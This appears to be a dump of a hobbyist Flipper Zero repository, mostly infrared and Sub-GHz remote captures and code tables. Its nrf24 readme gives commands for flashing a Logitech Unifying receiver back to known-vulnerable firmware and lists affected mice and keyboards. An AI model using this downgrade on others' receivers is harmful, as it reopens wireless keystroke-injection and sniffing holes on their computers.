00 00 20 | command: 55 00 00 00 21 | # 22 | name: 4 23 | type: parsed 24 | protocol: SIRC20 25 | address: 3A 09 00 00 26 | command: 5F 00 00 00 27 | # 28 | name: 5 29 | type: parsed 30 | protocol: SIRC20 31 | address: 3A 09 00 00 32 | command: 15 00 00 00 33 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/Take2.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: 1 5 | type: parsed 6 | protocol: SIRC 7 | address: 00 00 00 00 8 | command: 7F 00 00 00 9 | # 10 | name: 2 11 | type: parsed 12 | protocol: SIRC 13 | address: 00 00 00 00 14 | command: 65 00 00 00 15 | # 16 | name: 3 17 | type: parsed 18 | protocol: SIRC 19 | address: 00 00 00 00 20 | command: 55 00 00 00 21 | # 22 | name: 4 23 | type: parsed 24 | protocol: SIRC 25 | address: 00 00 00 00 26 | command: 5F 00 00 00 27 | # 28 | name: 5 29 | type: parsed 30 | protocol: SIRC 31 | address: 00 00 00 00 32 | command: 15 00 00 00 33 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/Unlock_0533.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: 1 5 | type: parsed 6 | protocol: SIRC20 7 | address: 3A 09 00 00 8 | command: 7F 00 00 00 9 | # 10 | name: 2 11 | type: parsed 12 | protocol: SIRC20 13 | address: 3A 09 00 00 14 | command: 65 00 00 00 15 | # 16 | name: 3 17 | type: parsed 18 | protocol: SIRC20 19 | address: 3A 09 00 00 20 | command: 55 00 00 00 21 | # 22 | name: 4 23 | type: parsed 24 | protocol: SIRC20 25 | address: 3A 09 00 00 26 | command: 5F 00 00 00 27 | # 28 | name: 5 29 | type: parsed 30 | protocol: SIRC20 31 | address: 3A 09 00 00 32 | command: 15 00 00 00 33 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/device_code_1533_tests.csv: -------------------------------------------------------------------------------- 1 | AllInOne ‘994’ code,Protocol,Address,Command 2 | Default 1533 Power,SIRC20,0x093A,0x15 3 | Default 1533 1,SIRC20,0x093A,0x00 4 | Default 1533 2,SIRC20,0x093A,0x01 5 | Default 1533 3,SIRC20,0x093A,0x02 6 | Default 1533 4,SIRC20,0x093A,0x03 7 | Default 1533 5,SIRC20,0x093A,0x04 8 | Default 1533 6,SIRC20,0x093A,0x05 9 | Default 1533 7,SIRC20,0x093A,0x06 10 | Default 1533 8,SIRC20,0x093A,0x07 11 | Default 1533 9,SIRC20,0x093A,0x08 12 | Default 1533 0,SIRC20,0x093A,0x09 13 | info,SIRC20,0x093A,0x54 14 | ok,SIRC20,0x093A,0x0B 15 | exit,SIRC20,0x093A,0x0E 16 | menu,SIRC20,0x093A,0x1B 17 | rew,SIRC20,0x093A,0x22 18 | FF,SIRC20,0x093A,0x23 19 | play,SIRC20,0x093A,0x32 20 | pause,SIRC20,0x093A,0x39 21 | prev,SIRC20,0x093A,0x30 22 | next,SIRC20,0x093A,0x31 23 | stop,SIRC20,0x093A,0x38 24 | 00189,SIRC20,0x093A,0x7F 25 | 00255,SIRC20,0x093A,0x65 26 | 00095,SIRC20,0x093A,0x51 27 | 00221,SIRC20,0x093A,0x5F 28 | 00079,SIRC20,0x093A,0x62 29 | 00001,SIRC20,0x093A,0x62 30 | 00002,SIRC20,0x093A,0x60 31 | 00127,SIRC20,0x093A,0x6D 32 | 00128,SIRC20,0x093A,0x6A 33 | 00256,SIRC20,0x093A,0x62 34 | 00003,SIRC20,0x093A,0x64 35 | 00004,SIRC,0x00,0x03 36 | 00005,SIRC,0x00,0x07 37 | 00006,SIRC,0x00,0x01 38 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/oneforall_captures/Blu_1633_sirc20.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: SIRC20 7 | address: 3A 09 00 00 8 | command: 15 00 00 00 9 | # 10 | name: 1 11 | type: parsed 12 | protocol: SIRC20 13 | address: 3A 09 00 00 14 | command: 00 00 00 00 15 | # 16 | name: 2 17 | type: parsed 18 | protocol: SIRC20 19 | address: 3A 09 00 00 20 | command: 01 00 00 00 21 | # 22 | name: 3 23 | type: parsed 24 | protocol: SIRC20 25 | address: 3A 09 00 00 26 | command: 02 00 00 00 27 | # 28 | name: 4 29 | type: parsed 30 | protocol: SIRC20 31 | address: 3A 09 00 00 32 | command: 03 00 00 00 33 | # 34 | name: 5 35 | type: parsed 36 | protocol: SIRC20 37 | address: 3A 09 00 00 38 | command: 04 00 00 00 39 | # 40 | name: 6 41 | type: parsed 42 | protocol: SIRC20 43 | address: 3A 09 00 00 44 | command: 05 00 00 00 45 | # 46 | name: 7 47 | type: parsed 48 | protocol: SIRC20 49 | address: 3A 09 00 00 50 | command: 06 00 00 00 51 | # 52 | name: 8 53 | type: parsed 54 | protocol: SIRC20 55 | address: 3A 09 00 00 56 | command: 07 00 00 00 57 | # 58 | name: 9 59 | type: parsed 60 | protocol: SIRC20 61 | address: 3A 09 00 00 62 | command: 08 00 00 00 63 | # 64 | name: 0 65 | type: parsed 66 | protocol: SIRC20 67 | address: 3A 09 00 00 68 | command: 09 00 00 00 69 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/oneforall_captures/Dvd_0675_necext.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: NECext 7 | address: 87 22 00 00 8 | command: 41 BE 00 00 9 | # 10 | name: 1 11 | type: parsed 12 | protocol: NECext 13 | address: 87 22 00 00 14 | command: 45 BA 00 00 15 | # 16 | name: 2 17 | type: parsed 18 | protocol: NECext 19 | address: 87 22 00 00 20 | command: 46 B9 00 00 21 | # 22 | name: 3 23 | type: parsed 24 | protocol: NECext 25 | address: 87 22 00 00 26 | command: 47 B8 00 00 27 | # 28 | name: 4 29 | type: parsed 30 | protocol: NECext 31 | address: 87 22 00 00 32 | command: 48 B7 00 00 33 | # 34 | name: 5 35 | type: parsed 36 | protocol: NECext 37 | address: 87 22 00 00 38 | command: 49 B6 00 00 39 | # 40 | name: 6 41 | type: parsed 42 | protocol: NECext 43 | address: 87 22 00 00 44 | command: 4A B5 00 00 45 | # 46 | name: 7 47 | type: parsed 48 | protocol: NECext 49 | address: 87 22 00 00 50 | command: 4B B4 00 00 51 | # 52 | name: 8 53 | type: parsed 54 | protocol: NECext 55 | address: 87 22 00 00 56 | command: 4C B3 00 00 57 | # 58 | name: 9 59 | type: parsed 60 | protocol: NECext 61 | address: 87 22 00 00 62 | command: 4D B2 00 00 63 | # 64 | name: 0 65 | type: parsed 66 | protocol: NECext 67 | address: 87 22 00 00 68 | command: 4E B1 00 00 69 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/oneforall_captures/Dvd_0741_sam32.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: Samsung32 7 | address: 2D 00 00 00 8 | command: 30 00 00 00 9 | # 10 | name: 1 11 | type: parsed 12 | protocol: Samsung32 13 | address: 2D 00 00 00 14 | command: 3B 00 00 00 15 | # 16 | name: 2 17 | type: parsed 18 | protocol: Samsung32 19 | address: 2D 00 00 00 20 | command: 3C 00 00 00 21 | # 22 | name: 3 23 | type: parsed 24 | protocol: Samsung32 25 | address: 2D 00 00 00 26 | command: 3D 00 00 00 27 | # 28 | name: 4 29 | type: parsed 30 | protocol: Samsung32 31 | address: 2D 00 00 00 32 | command: 3E 00 00 00 33 | # 34 | name: 5 35 | type: parsed 36 | protocol: Samsung32 37 | address: 2D 00 00 00 38 | command: 3F 00 00 00 39 | # 40 | name: 6 41 | type: parsed 42 | protocol: Samsung32 43 | address: 2D 00 00 00 44 | command: 40 00 00 00 45 | # 46 | name: 7 47 | type: parsed 48 | protocol: Samsung32 49 | address: 2D 00 00 00 50 | command: 41 00 00 00 51 | # 52 | name: 8 53 | type: parsed 54 | protocol: Samsung32 55 | address: 2D 00 00 00 56 | command: 42 00 00 00 57 | # 58 | name: 9 59 | type: parsed 60 | protocol: Samsung32 61 | address: 2D 00 00 00 62 | command: 43 00 00 00 63 | # 64 | name: 0 65 | type: parsed 66 | protocol: Samsung32 67 | address: 2D 00 00 00 68 | command: 44 00 00 00 69 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/oneforall_captures/Dvd_1516_sirc20.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: SIRC20 7 | address: 5A 1C 00 00 8 | command: 15 00 00 00 9 | # 10 | name: 1 11 | type: parsed 12 | protocol: SIRC20 13 | address: 5A 1C 00 00 14 | command: 00 00 00 00 15 | # 16 | name: 2 17 | type: parsed 18 | protocol: SIRC20 19 | address: 5A 1C 00 00 20 | command: 01 00 00 00 21 | # 22 | name: 3 23 | type: parsed 24 | protocol: SIRC20 25 | address: 5A 1C 00 00 26 | command: 02 00 00 00 27 | # 28 | name: 4 29 | type: parsed 30 | protocol: SIRC20 31 | address: 5A 1C 00 00 32 | command: 03 00 00 00 33 | # 34 | name: 5 35 | type: parsed 36 | protocol: SIRC20 37 | address: 5A 1C 00 00 38 | command: 04 00 00 00 39 | # 40 | name: 6 41 | type: parsed 42 | protocol: SIRC20 43 | address: 5A 1C 00 00 44 | command: 05 00 00 00 45 | # 46 | name: 7 47 | type: parsed 48 | protocol: SIRC20 49 | address: 5A 1C 00 00 50 | command: 06 00 00 00 51 | # 52 | name: 8 53 | type: parsed 54 | protocol: SIRC20 55 | address: 5A 1C 00 00 56 | command: 07 00 00 00 57 | # 58 | name: 9 59 | type: parsed 60 | protocol: SIRC20 61 | address: 5A 1C 00 00 62 | command: 08 00 00 00 63 | # 64 | name: 0 65 | type: parsed 66 | protocol: SIRC20 67 | address: 5A 1C 00 00 68 | command: 09 00 00 00 69 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/oneforall_captures/Tv_3519_nec.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Power 5 | type: parsed 6 | protocol: NEC 7 | address: 04 00 00 00 8 | command: 08 00 00 00 9 | # 10 | name: 1 11 | type: parsed 12 | protocol: NEC 13 | address: 04 00 00 00 14 | command: 11 00 00 00 15 | # 16 | name: 2 17 | type: parsed 18 | protocol: NEC 19 | address: 04 00 00 00 20 | command: 12 00 00 00 21 | # 22 | name: 3 23 | type: parsed 24 | protocol: NEC 25 | address: 04 00 00 00 26 | command: 13 00 00 00 27 | # 28 | name: 4 29 | type: parsed 30 | protocol: NEC 31 | address: 04 00 00 00 32 | command: 14 00 00 00 33 | # 34 | name: 5 35 | type: parsed 36 | protocol: NEC 37 | address: 04 00 00 00 38 | command: 15 00 00 00 39 | # 40 | name: 6 41 | type: parsed 42 | protocol: NEC 43 | address: 04 00 00 00 44 | command: 16 00 00 00 45 | # 46 | name: 7 47 | type: parsed 48 | protocol: NEC 49 | address: 04 00 00 00 50 | command: 17 00 00 00 51 | # 52 | name: 8 53 | type: parsed 54 | protocol: NEC 55 | address: 04 00 00 00 56 | command: 18 00 00 00 57 | # 58 | name: 9 59 | type: parsed 60 | protocol: NEC 61 | address: 04 00 00 00 62 | command: 19 00 00 00 63 | # 64 | name: 0 65 | type: parsed 66 | protocol: NEC 67 | address: 04 00 00 00 68 | command: 10 00 00 00 69 | -------------------------------------------------------------------------------- /infrared/experimental_sony_unlock/various_codes.csv: -------------------------------------------------------------------------------- 1 | Device,Device ID,Power button after device code programmed,Code 1,Code 2,Code 3,Code 4,Code 5 2 | DVD,0534,"NECext A:0x0CB6,C:0x6E91",00189 A:0x0CB6 C:0x7F80,00255 A:0x0CB6 C:0x659A,00095 A:0x0CB6 C:0x55AA,00221 A:0x0CB6 C:0x55AA,00079 A:0x0CB6 C:0x15EA 3 | ,0534,"NECext A:0x0CB6,C:0x6E91",00001 A:0x0CB6 C:0x6699,00002 A:0x0CB6 C:0x609F,00003 A:0x0CB6 C:0x649B,00004 A:0x0CB6 C:0x837C,00005 A:0x0CB6 C:0x8778 4 | ,0534,"NECext A:0x0CB6,C:0x6E91",00001 A:0x0CB6 C:0x6699,00002 A:0x0CB6 C:0x609F,00127 A:0x0CB6 C:0x6D92 ,00128 A:0x0CB6 C:0x6A95,00256 A:0x0CB6 C:0x629D 5 | DVD,1533,"SIRC20 A:0x093A,C:0x15",00189 A:0x093A C:0x7F,00255 A:0x093A C:0x65,00095 A:0x093a C:0x51,00221 A:0x093A C:0x5F,00079 A:0x093A C:0x15 6 | ,1533,"SIRC20 A:0x093A,C:0x15",00001 A:0x093A C:0x62,00002 A:0x093A C:0x60,00127 A:0x093A C:0x6D,00128 A:0x093A C:0x6A,00256 A:0X093A C:0x62 7 | -------------------------------------------------------------------------------- /infrared/hex-captures/Raw.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | name: Fwd 5 | type: raw 6 | frequency: 38000 7 | duty_cycle: 0.330000 8 | data: 109 1926 143 1206 299 352 112 553 116 537 108 555 115 1231 207 1148 206 14447 112 1235 205 464 115 535 113 554 113 536 111 1236 112 1261 110 104832 205 461 116 532 114 549 331 318 113 550 115 532 114 1231 115 12525 111 1927 348 301 205 461 329 318 115 551 327 320 113 551 143 1202 207 9 | -------------------------------------------------------------------------------- /infrared/hex-captures/raw_cli.txt: -------------------------------------------------------------------------------- 1 | RAW, 21 samples: 2 | 113 555 111 235 108 208 88 239 112 209 110 236 105 208 95 553 114 532 118 1572 106 3 | RAW, 29 samples: 4 | 111 1924 431 216 185 481 114 208 77 245 116 209 104 237 113 209 75 247 113 210 105 237 112 883 108 238 115 886 107 5 | RAW, 21 samples: 6 | 108 1926 429 215 118 548 115 209 75 244 145 522 114 209 75 246 116 550 113 1229 204 7 | RAW, 17 samples: 8 | 109 1925 428 218 116 549 115 533 111 550 116 533 111 551 115 1227 206 9 | RAW, 27 samples: 10 | 109 237 113 551 114 209 75 244 206 460 115 210 74 247 114 550 114 209 75 247 113 883 108 239 113 886 107 11 | 12 | -------------------------------------------------------------------------------- /infrared/ir_torch.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | # Turn your Flipper's IR into an IR torch 5 | # (I'm not responsible if your IR LEDs burn out prematurely) 6 | # 7 | # Hold down Left and Back to reboot your Flipper to stop the torch 8 | # 9 | # By: emptythevoid 10 | # 11 | name: On 12 | type: raw 13 | frequency: 38000 14 | duty_cycle: 0.330000 15 | data: 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 10000000 10 16 | -------------------------------------------------------------------------------- /infrared/magnavox_nb179/README.md: -------------------------------------------------------------------------------- 1 | Capture from a remote to an old Magnavox MWD 2206. Currently untested. 2 | 3 | This remote uses a mix of NECext and Raw commands, for some reason. I was also not able to get any response from the chan+/chan- buttons on the remote, so it may not be a full capture. 4 | -------------------------------------------------------------------------------- /infrared/promethean_prm_35/README.md: -------------------------------------------------------------------------------- 1 | This is a copy/paste of this Vivitek remote submitted by jaroslavmraz 2 | https://raw.githubusercontent.com/logickworkshop/Flipper-IRDB/069724da93d9433caa759cdbcfa86514ae57093f/Projectors/Vivitek/Vivitek.ir 3 | 4 | It's possible that not all the features of the original remote are present, but this was tested and seems to be a very close match. 5 | -------------------------------------------------------------------------------- /infrared/ugreen_hdmi_switch_3/ugreen_hdmi_switch_3.ir: -------------------------------------------------------------------------------- 1 | Filetype: IR signals file 2 | Version: 1 3 | # 4 | # Captured by: emptythevoid 5 | # 6 | # https://www.amazon.com/gp/product/B0865JJLHD/ 7 | # 8 | name: 1 9 | type: parsed 10 | protocol: NEC 11 | address: 80 00 00 00 12 | command: 02 00 00 00 13 | # 14 | name: 2 15 | type: parsed 16 | protocol: NEC 17 | address: 80 00 00 00 18 | command: 04 00 00 00 19 | # 20 | name: 3 21 | type: parsed 22 | protocol: NEC 23 | address: 80 00 00 00 24 | command: 06 00 00 00 25 | # 26 | name: Next 27 | type: parsed 28 | protocol: NEC 29 | address: 80 00 00 00 30 | command: 08 00 00 00 31 | -------------------------------------------------------------------------------- /nrf24/dump_RQR12.03_B0025_BOT01.02.B0015.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/emptythevoid/flipperzero/d436d1c777ed81b011fed828475cbf89be36190f/nrf24/dump_RQR12.03_B0025_BOT01.02.B0015.bin -------------------------------------------------------------------------------- /nrf24/readme.md: -------------------------------------------------------------------------------- 1 | Use this bin file to attempt to downgrade a compatible Logitech Unifying Receiver. This is a dump of a known-vulnerable receiver running firmware 2 | RQR12.03_B0025. I have successfully flashed this to a receiver that was running a newer (patched) firmware. 3 | 4 | Usage: 5 | 6 | If on Ubuntu, first do: 7 | 8 | sudo apt install golang-go 9 | 10 | Then: 11 | 12 | git clone https://github.com/mame82/munifying 13 | 14 | cd munifying 15 | 16 | go build 17 | 18 | sudo ./munifying flash -r /path/to/dump.bin 19 | 20 | ## Errors: 21 | If munifying says "CAUTION: According to bootloader version, only signed firmwares are accepted! Closing Logitech Receiver in bootloader mode... Error provided firmware has no signature, but the bootloader requires one." This means that the firmware on the dongle has been updated to enforce signature checks, and cannot be downgraded to vulnerable firmware. 22 | 23 | ## Common and Identified Vulnerabilities: 24 | M705 25 | 26 | M325 27 | 28 | M185 29 | 30 | MK320 (keyboard/mouse combo) 31 | 32 | G700 Gaming Mouse (non-unifying receiver) 33 | 34 | Older R800 (not sure firmware/hardware revision. Has an LCD and green laser pointer button.) 35 | 36 | ## Notes: 37 | 9/18/24: New MK520 bundle (mouse M310) not vulnerable. Dongle using signed firmware 38 | 39 | 9/18/24: New-in-box R400 not able to be sniffed 40 | 41 | 11/14/24: New-in-box Logitech M185 using dongle "046d:c542 Logitech, Inc. Wireless Receiver" was not detected by 2MBbps or 1 MBps scan. Solaar didn't even detect this as a logitech adapter. 42 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/2.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 60253 -98 29297 -258 153 -318 123 -634 131 -306 155 -470 131 -806 129 -306 123 -326 135 -300 123 -660 133 -788 165 -450 139 -480 135 -322 143 -270 155 -290 143 -618 171 -91304 453 -312 109 -326 143 -626 133 -310 141 -460 133 -812 141 -272 161 -284 155 -272 155 -636 159 -802 137 -460 125 -472 161 -278 155 -272 155 -308 173 -596 171 -91318 409 -342 105 -324 107 -660 99 -344 105 -494 133 -824 105 -304 127 -350 107 -324 105 -656 131 -808 129 -472 131 -482 141 -308 131 -296 141 -326 141 -626 133 -127692 99 -630 99 -368 163 -134 135 -762 165 -794 693 -98 231 -334 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/4.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -296 99 -394 163 -658 263 -362 67 -1512 165 -66 97 -132 195 -196 197 -1152 65 -100 227 -692 65 -328 65 -560 63 -756 427 -332 97 -4152 131 -630 99 -100 131 -132 263 -462 99 -1680 261 -360 65 -364 65 -862 99 -1092 99 -1000 197 -494 97 -1944 65 -626 361 -426 131 -166 563 -198 263 -6420 63 -100 97 -264 163 -426 229 -392 97 -396 99 -12150 65 -6662 231 -792 65 -6844 165 -794 131 -5726 97 -7498 163 -1094 429 -1592 67 -132 265 -166 165 -1716 131 -100 197 -266 431 -132 133 -168 197 -168 199 -730 133 -166 99 -134 65 -498 163 -264 131 -164 231 -166 297 -200 663 -496 165 -396 363 -134 231 -200 299 -134 65 -762 97 -134 97 -366 331 -166 97 -228 227 -6752 97 -296 97 -66 261 -100 97 -230 231 -66 97 -302 65 -166 99 -7152 97 -662 97 -164 133 -198 97 -6866 331 -98 65 -394 263 -166 131 -68 99 -426 265 -130 99 -66 65 -3670 67 -532 99 -2436 131 -626 65 -68 97 -266 65 -366 331 -168 329 -1284 527 -274 179 -292 143 -592 165 -312 143 -428 165 -798 139 -274 155 -328 143 -286 137 -302 143 -794 131 -446 153 -458 165 -288 181 -276 129 -464 173 -274 159 -91754 447 -318 109 -324 105 -652 131 -318 93 -502 133 -818 131 -274 155 -312 137 -304 125 -306 125 -832 123 -486 131 -470 133 -314 141 -290 143 -470 137 -318 141 -91734 453 -288 141 -304 123 -632 163 -274 155 -470 131 -810 133 -320 143 -274 155 -326 107 -316 137 -776 167 -460 131 -454 161 -286 153 -304 125 -466 163 -284 153 -91776 425 -3990 63 -376 63 -372 63 -888 93 -366 67 -528 101 -340 67 -159248 131 -300 99 -6174 65 -66 331 -68 165 -266 263 -562 99 -68 97 -2906 65 -164 65 -98 65 -198 65 -722 295 -592 165 -198 129 -164 65 -98 133 -66 65 -264 99 -66 97 -200 99 -230 233 -1194 67 -3400 99 -7262 65 -196 65 -230 131 -294 97 -264 461 -4828 165 -264 199 -166 133 -692 97 -162 97 -5820 65 -366 361 -330 163 -100 129 -328 393 -166 65 -498 231 -564 163 -364 165 -432 131 -298 165 -232 197 -100 263 -66 99 -66 65 -862 99 -266 199 -66 99 -202 99 -632 65 -564 461 -7562 163 -196 99 -1056 99 -98 133 -132 363 -2368 97 -3974 99 -7024 99 -7194 299 -164 301 -830 165 -432 165 -198 231 -798 197 -266 97 -132 65 -100 231 -166 133 -234 67 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/5.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 133 -332 361 -234 65 -1062 131 -1720 195 -526 131 -362 263 -562 65 -132 197 -264 97 -428 163 -366 99 -98 65 -132 129 -720 65 -756 361 -5378 129 -7444 263 -628 65 -100 99 -264 99 -598 65 -6820 99 -1028 65 -168 165 -232 97 -7076 165 -200 99 -100 99 -6626 99 -202 65 -630 163 -364 65 -730 65 -4746 99 -734 65 -7282 265 -1454 163 -3952 99 -364 67 -464 131 -564 199 -524 131 -758 133 -790 63 -462 97 -132 97 -396 263 -232 131 -100 65 -68 131 -730 165 -430 329 -196 65 -8046 99 -166 97 -168 101 -9446 165 -6888 99 -1974 461 -430 99 -1064 65 -234 65 -2058 131 -530 629 -66 265 -168 265 -232 231 -332 165 -66 361 -196 99 -130 99 -596 99 -794 233 -266 133 -234 65 -66 99 -264 99 -168 393 -1028 99 -3130 481 -258 189 -290 145 -600 173 -274 155 -462 171 -778 167 -288 145 -274 153 -292 179 -246 169 -770 159 -472 129 -444 183 -296 137 -282 179 -428 167 -450 161 -91742 447 -101448 417 -4874 63 -372 63 -888 65 -548 61 -554 93 -352 101 -492 95 -544 65 -91826 425 -292 89 -372 63 -700 99 -340 93 -514 99 -864 65 -348 99 -338 95 -340 127 -338 93 -862 65 -514 93 -520 97 -340 125 -316 135 -460 127 -506 99 -156500 65 -132 65 -462 163 -130 161 -100 263 -164 97 -100 227 -6700 197 -132 165 -1920 199 -7136 197 -202 99 -628 231 -164 261 -232 131 -98 131 -830 99 -300 197 -66 99 -696 163 -4150 67 -7118 99 -134 99 -202 65 -600 165 -100 65 -592 65 -66 97 -1328 99 -266 133 -66 133 -332 99 -596 65 -100 97 -134 97 -300 135 -598 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/6.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 65 -196 229 -166 131 -886 263 -394 197 -626 65 -362 99 -262 63 -428 99 -296 97 -794 265 -264 163 -196 163 -826 65 -68 429 -832 167 -134 65 -298 265 -756 361 -264 295 -7152 99 -434 99 -230 197 -166 199 -100 65 -3182 65 -994 163 -1482 163 -6948 65 -1546 131 -594 229 -8224 163 -7624 99 -200 65 -530 65 -268 65 -168 63 -6614 231 -524 97 -296 97 -164 197 -230 97 -66 131 -5900 67 -1692 67 -462 67 -130 65 -2010 65 -330 65 -466 131 -434 99 -730 165 -6766 227 -394 825 -300 65 -100 595 -992 231 -362 195 -394 393 -166 165 -232 99 -100 97 -526 165 -724 197 -1316 97 -660 165 -726 329 -298 97 -198 229 -398 163 -66 295 -164 529 -664 65 -1498 331 -8614 65 -328 131 -262 65 -1318 65 -3616 97 -6692 99 -198 165 -300 99 -932 99 -926 477 -292 129 -326 123 -632 163 -274 155 -470 131 -812 133 -322 143 -270 157 -326 105 -314 135 -808 135 -458 133 -492 133 -296 141 -288 179 -426 177 -614 139 -91330 421 -314 109 -328 141 -622 131 -324 123 -470 133 -822 131 -324 107 -308 127 -308 125 -304 155 -806 135 -454 173 -450 133 -322 143 -272 155 -462 133 -646 131 -91324 467 -266 119 -334 125 -642 127 -310 135 -466 135 -804 135 -304 153 -306 125 -306 123 -328 135 -788 133 -490 133 -460 135 -306 143 -326 143 -428 173 -618 139 -91314 457 -159106 65 -3426 97 -166 99 -668 97 -198 167 -494 67 -7330 165 -368 99 -1528 263 -4978 99 -66 99 -1160 163 -558 131 -3124 263 -496 231 -164 65 -460 165 -394 165 -920 97 -1744 229 -98 99 -98 131 -66 97 -132 229 -196 231 -888 197 -166 131 -394 197 -296 65 -166 65 -296 97 -66 99 -232 99 -234 131 -100 99 -100 65 -100 97 -2572 65 -132 131 -362 163 -294 97 -658 229 -6880 165 -890 163 -66 131 -196 65 -590 65 -460 165 -4592 65 -200 99 -1626 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/7.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 163 -232 167 -232 67 -430 65 -100 131 -98 99 -498 165 -664 131 -400 131 -166 101 -100 167 -132 167 -466 131 -132 563 -532 97 -166 301 -696 67 -398 231 -464 67 -464 67 -756 427 -862 99 -298 131 -6838 197 -1054 65 -196 97 -1020 99 -8816 131 -168 199 -562 131 -7308 65 -66 131 -330 131 -6692 163 -794 67 -464 99 -366 67 -6690 65 -960 297 -664 265 -364 167 -7072 131 -1924 65 -366 65 -758 481 -310 103 -336 93 -692 99 -358 69 -500 101 -848 99 -326 137 -326 105 -338 91 -666 131 -798 127 -508 97 -476 135 -306 127 -314 123 -502 133 -818 97 -90920 419 -292 153 -292 141 -650 139 -272 155 -452 163 -782 165 -288 145 -306 127 -306 123 -634 163 -800 123 -456 165 -460 169 -284 143 -290 143 -450 173 -768 165 -90878 413 -814 65 -550 67 -526 67 -376 99 -340 103 -494 99 -854 105 -90888 459 -3974 63 -388 65 -880 65 -540 65 -518 103 -372 65 -354 93 -536 65 -852 97 -148458 167 -398 199 -400 229 -168 129 -132 229 -66 229 -996 199 -166 65 -430 131 -398 65 -302 99 7 | -------------------------------------------------------------------------------- /subghz/ATI_Wonder_II/8.sub: -------------------------------------------------------------------------------- 1 | Filetype: Flipper SubGhz RAW File 2 | Version: 1 3 | Frequency: 433920000 4 | Preset: FuriHalSubGhzPresetOok650Async 5 | Protocol: RAW 6 | RAW_Data: 99 -66 65 -198 133 -732 133 -266 165 -266 131 -166 65 -2354 233 -530 65 -298 65 -100 99 -134 163 -596 263 -400 131 -100 233 